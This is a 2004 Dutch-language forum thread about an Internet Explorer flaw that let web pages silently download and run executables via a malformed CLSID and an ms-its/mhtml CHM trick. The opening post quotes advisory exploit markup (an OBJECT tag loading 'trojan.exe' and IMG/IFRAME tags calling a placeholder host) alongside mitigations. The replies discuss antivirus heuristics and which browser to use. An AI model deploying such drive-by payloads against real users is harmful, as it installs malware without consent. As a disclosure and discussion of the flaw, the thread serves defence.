[IE] Nieuw ontdekte bug laat downloaden/uitvoeren code toe - Privacy en beveiliging

vrijdag 20 februari 2004 21:02

Acties:

Computers can do that?

Topicstarter

Zojuist las ik op Securityfocus.com een artikel wat een vervelende en potentieel gevaar opleverende bug in alle versies van Internet Explorer. Er is nog geen hotfix voor.

Deze fout staat het downloaden van executables op de achtergrond toe.
De gebruikte malafide CLSID parameter staat ook het uitvoeren van deze code toe. Als op een geinfecteerde computer een willekeurige website wordt geopend met IE, kan het zijn dat deze executables uitgevoerd worden zonder dat de gebruiker er iets van merkt.

The exploit allows executable files to be downloaded and run in the background without
user intervention. It employs a malformed CLSID parameter, which enables it
to execute a file on the infected user's machine. When an infected user visits
a Web site, it can cause a possible malicious executable file to run on the system
without user permission.

The exploit works by tagging another script, which contains a CLASSID exploit as a
CHM. The following is an illustration of how this exploit works:

The file, LAUNCH.HTML, contains the following codes, which utilizes the exploit:

<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>

To execute the script (LAUNCH.HTML) as a CHM, another script tags and calls LAUNCH.HTML
using the following:

[img]'ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'[/img]

Er is nog geen patch uitgebracht. tot die tijd kan je het volgende doen :

Uitvoeren van .chm bestanden blokkeren : Configuratiescherm > Folder Options > File/Folder Options/File
Types/CHM ..)
De registersleutel 'HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its\' hernoemen.
(Tijdelijk) overschakelen op een andere browser
Wachten op een hotfix van Microsoft.

Het artikel is hier na te lezen:
http://www.securityfocus.com/archive/1/354447

Deze bug lijkt enigzins op een bug uit 2000. Echter werd deze per mail verspreid. Meer info over die bug, met dank aan elevator voor de link :
http://www.spconnect.com/pipermail/esd-l/2000q2/002193.html

[ Voor 8% gewijzigd door sanfranjake op 20-02-2004 21:04 ]

Mijn spoorwegfotografie
Somda - Voor en door treinenspotters

vrijdag 20 februari 2004 22:01

Acties:

Spider.007

* Tetragrammaton

Hoe kan het dat deze CLSID's zo 'buggy' lijken? Wat is de reden om in een applicatie in te programmeren dat hij bij een bepaalde code het uitvoeren van malicious code toelaat?

http://www.alerta-antivir...talle_virus.html?cod=3602

---
Prozium - The great nepenthe. Opiate of our masses. Glue of our great society. Salve and salvation, it has delivered us from pathos, from sorrow, the deepest chasms of melancholy and hate

zaterdag 21 februari 2004 00:04

Acties:

alt-92

ye olde farte

Noem het een design flaw, anderen noemen het weer een "feature" omdat je dan allerlei hooks biedt om extra functionaliteit aan een filemanager / webbrowser te hangen.

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

maandag 23 februari 2004 21:56

Acties:

BazP

Norton Antivirus begint te schreeuwen als ik dit topic open

Virus name: Bloodhound.exploid.6

maandag 23 februari 2004 22:28

Acties:

Spider.007

* Tetragrammaton

BazP schreef op 23 februari 2004 @ 21:56:
Norton Antivirus begint te schreeuwen als ik dit topic open

Virus name: Bloodhound.exploid.6

Dan hebben ze dat redelijk slecht geprogrameerd; aangezien er hier nergens de bewuste html code staat (alleen escaped)

---
Prozium - The great nepenthe. Opiate of our masses. Glue of our great society. Salve and salvation, it has delivered us from pathos, from sorrow, the deepest chasms of melancholy and hate

maandag 23 februari 2004 22:34

Acties:

StarLite

'ON ERROR RESUME NEXT

Spider.007 schreef op 23 februari 2004 @ 22:28:
[...]

Dan hebben ze dat redelijk slecht geprogrameerd; aangezien er hier nergens de bewuste html code staat (alleen escaped)

Dat zijn de bloodhound hueristics, die scannen op mogelijk virusachtige code aan de hand van een aantal algoritmen, dus niet via de virusdefs

tyrips, tywreps, tiewreps, tiereps, tie raps, ripties, taiwraps, kabelbindbandjes » Tie Wraps
\o/

maandag 23 februari 2004 22:59

Acties:

BazP

Beter dat ie honderd keer te veel jankt om iets wat niet gevaarlijk was, dan dat ie een keer niets doet als het wel zover is

ik vind het een goede zaak

maandag 23 februari 2004 23:08

Acties:

Verwijderd

BazP schreef op 23 februari 2004 @ 22:59:
Beter dat ie honderd keer te veel jankt om iets wat niet gevaarlijk was, dan dat ie een keer niets doet als het wel zover is
ik vind het een goede zaak

Wel erg gevoelige heuristics, nu maakt dat bij zulke code niet zo bar veel uit, je gaat er geen legit(belangrijke)files mee deleten, maar toch erg losjes..

Als je geïnteresseerd bent in pure heuristics, dus niet gemengd met sigs, dan zou je eens Dr. Web kunnen bekijken, of NOD32, de laatste wel alleen met de advanced heuristics ingeschakeld.

Bloodhound staat niet echt bekend om zijn klasse, hoewel het de laatste tijd wel beter lijkt te worden.

maandag 23 februari 2004 23:24

Acties:

StarLite

'ON ERROR RESUME NEXT

offtopic:
Ik heb zelf meer interesse in het nieuwe Sandbox princiepe van norman: SandBox is de gepatenteerde technologie van Norman voor de detectie van nieuwe, onbekende virussen. Hierbij wordt gebruik gemaakt van een veilige, virtuele computer binnen de eigenlijke computer. In deze omgeving kunnen virussen zichzelf kenbaar maken zonder het systeem te beschadigen.

Misschien een combinatie van deze 3 technieken? [Defs, hueristics en SandBox]. Lijkt me een interessant priciepe iig

Maar om even ontopic te komen. zou Micorsoft hier sneller een patch voor uit brengen dan de vorige 2 grote exploits, want dat heeft toen bijna een maand geduurd.
* StarLite is blij dat hij firefox gebruikt, er komen me de laatste tijd veel te veel van dit soort zware exploits aan het licht in IE...

tyrips, tywreps, tiewreps, tiereps, tie raps, ripties, taiwraps, kabelbindbandjes » Tie Wraps
\o/

maandag 23 februari 2004 23:34

Acties:

F_J_K

Moderator CSA/PB

Front verplichte underscores

BazP schreef op 23 februari 2004 @ 22:59:
Beter dat ie honderd keer te veel jankt om iets wat niet gevaarlijk was, dan dat ie een keer niets doet als het wel zover is
ik vind het een goede zaak

Daar ben ik het niet helemaal mee eens eigenlijk; als er vaak genoeg een melding komt let de gebruiker er niet meer op.
('The boy who cried wolf' enzo).

oeh en inderdaad ontopic:
vanwege de steeds verdergaande integratie met webtechnologien (minder relevant XML, hier belangrijker: bijv. de HTMl van Add/remove programs) vind ik dit niet heel vreemd dat zoiets zit ingebakken - alleen wel heel erg vervelend dat het ook buiten de localhost werkt.

[ Voor 27% gewijzigd door F_J_K op 23-02-2004 23:36 ]

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

dinsdag 24 februari 2004 01:33

Acties:

Exe-cuter

Zo lek als een zeef , daar hou ik het bij

Opera (of andere alternative browser) all the way

dinsdag 24 februari 2004 01:39

Acties:

Verwijderd

Exe-cuter schreef op 24 februari 2004 @ 01:33:
Zo lek als een zeef , daar hou ik het bij
Opera (of andere alternative browser) all the way

Zó bugfree is Opera nou ook weer niet.
Komt toch ook af en toe in het nieuws..

offtopic:
@StarLite
Feel free to open a topic over sandboxes of iets in die trant.
Daarom is dit forum er(onder andere).

dinsdag 24 februari 2004 11:14

Acties:

Exe-cuter

Verwijderd schreef op 24 februari 2004 @ 01:39:
[...]

Zó bugfree is Opera nou ook weer niet.
Komt toch ook af en toe in het nieuws..

offtopic:
@StarLite
Feel free to open a topic over sandboxes of iets in die trant.
Daarom is dit forum er(onder andere).

Dat klopt , Mozilla en Opera zullen zeker ook veel beveiligingsfouten hebben (en omdat het zulke jonge browsers zijn mss nog opvallend veel) , maar deze zijn ontstaan ten tijde dat er goede beveiliging nodig was en zijn ook volgens dit principe opgebouwd. Internet explorer is ontstaan toen er nog bijna niet gesproken werd over "beveiligingslekken" + deze zit volledig in je systeem geintegreerd --> 1 lek en je hele systeem kan open liggen

dinsdag 24 februari 2004 11:37

Acties:

Verwijderd

BazP schreef op 23 februari 2004 @ 22:59:
Beter dat ie honderd keer te veel jankt om iets wat niet gevaarlijk was, dan dat ie een keer niets doet als het wel zover is
ik vind het een goede zaak

kweenie hoor. laatst met die exploit bug dat je een url kon veranderen:
mcafee vond het nodig om iedere keer moord en brand te schreeuwen. daar werd ik na een tijdje wel moe van hoor.

dinsdag 24 februari 2004 11:42

Acties:

Verwijderd

Verwijderd schreef op 24 februari 2004 @ 11:37:
[...]

kweenie hoor. laatst met die exploit bug dat je een url kon veranderen:
mcafee vond het nodig om iedere keer moord en brand te schreeuwen. daar werd ik na een tijdje wel moe van hoor.

Vooral in USA was/is dat ding erg populair hoor..
Tenzij dat ding constant liep te FP'en, vind ik het wel een goede zaak.